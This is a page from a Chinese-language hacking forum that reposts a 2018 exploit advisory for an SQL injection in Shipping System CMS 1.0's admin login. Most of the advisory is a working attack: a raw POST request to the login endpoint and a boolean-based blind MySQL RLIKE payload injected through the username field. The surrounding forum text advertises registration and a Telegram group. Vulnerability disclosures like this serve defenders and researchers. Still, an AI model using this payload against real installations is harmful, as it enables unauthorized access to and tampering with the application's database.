Shipping System CMS 1.0 - SQL Injection - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: Shipping System CMS 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-05-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor : Wecodex Solutions
# Vendor Homepage: https://www.wecodex.com/item/view/shipping-system-by-parcel-in-php-and-mysql/4
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.

# PoC : SQLi :
# Demo : https://Target/demos/sendpack/admin/

https://Target/demos/sendpack/admin/index.php?action=processlogin

POST /demos/sendpack/admin/index.php?action=processlogin HTTP/1.1
Host: www.wecodex.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://Target/demos/sendpack/admin/
Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
username=admin&password=123456


# Vulnerable Payload :
# Parameter: username (POST)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: 

username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN
0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Shipping System CMS 1.0 - SQL Injection

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索